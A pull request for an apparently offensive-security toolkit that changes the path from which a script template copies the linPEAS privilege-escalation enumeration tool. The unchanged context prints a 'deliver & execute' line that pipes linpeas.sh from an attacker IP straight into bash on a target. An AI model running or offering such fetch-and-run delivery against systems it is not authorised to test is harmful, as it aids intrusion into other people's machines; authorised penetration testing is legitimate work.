### PR TITLE
fix: changed linpeas reference path

### DIFF
--- a/src/profi/templates/scripts/deliver-linux-linPEAS
+++ b/src/profi/templates/scripts/deliver-linux-linPEAS
@@ -1,4 +1,4 @@
-mkdir -p packstation/outbound; cp -n /usr/share/peass/linpeas/* packstation/outbound/; \
+mkdir -p packstation/outbound; cp -n <%=$(esh variables/tools_dir)%>/linpeas/* packstation/outbound/; \
 echo '================================================================'; \
 echo '                       -----Linux------                         '; \
 echo 'Deliver & execute: curl http://<%=$(esh variables/attacker_ip)%>:<%=$(esh variables/delivery_outbound_port)%>/linpeas.sh | bash > <%=$(esh variables/delivery_path_linux)%>/report.txt'; \


### PR DESCRIPTION
This is fixing an issue (https://github.com/pluggero/profi/issues/4) where linpeas was not used from the tools directory.